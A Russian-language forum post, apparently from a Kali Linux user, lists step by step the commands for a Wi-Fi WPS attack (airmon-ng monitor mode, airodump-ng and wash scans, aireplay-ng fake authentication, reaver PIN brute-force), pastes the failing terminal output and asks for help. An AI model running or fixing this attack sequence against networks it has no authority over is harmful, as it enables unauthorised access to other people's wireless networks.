Сообщение от
Kevin Shindel
сначала в отдельном окне
Код:
aireplay-ng -1 100 -a [MAC] wlan0
потом в отдлельном окне
Код:
reaver -i wlan0 -b [MAC] -vv -c [channel] -aAwSNE
Ничего не получается, на шаге:
Код:
aireplay-ng -1 100 -a [MAC] wlan0
Все по порядку, делал так:
1. iwconfig
2. airmon-ng check kill
3. airmon-ng start wlan1
4. airodump-ng wlan1mon
5. wash -i wlan1mon -C
6.
root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 wlan1mon
No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)
17:57:14 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
17:57:24 No such BSSID available.
Please specify an ESSID (-e).
(добавил название сети)
root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1mon
No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)
17:58:03 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
17:58:13 No such BSSID available.
(эта сеть находится на 6 канале, но aireplay-ng это не понимает)
(выбрал другую точку на 1 канале)
root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 wlan1mon
No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)
17:49:38 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
17:49:38 Sending Authentication Request (Open System)
...
17:50:08 Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.
7. понимаю что уже нет смысла запускать reaver но все равно его запускаю в другом окне.
reaver -i wlan1mon -b 00:11:22:33:44:55 -vv -c 1 -aAwSNE
В результате все как и раньше, что делать?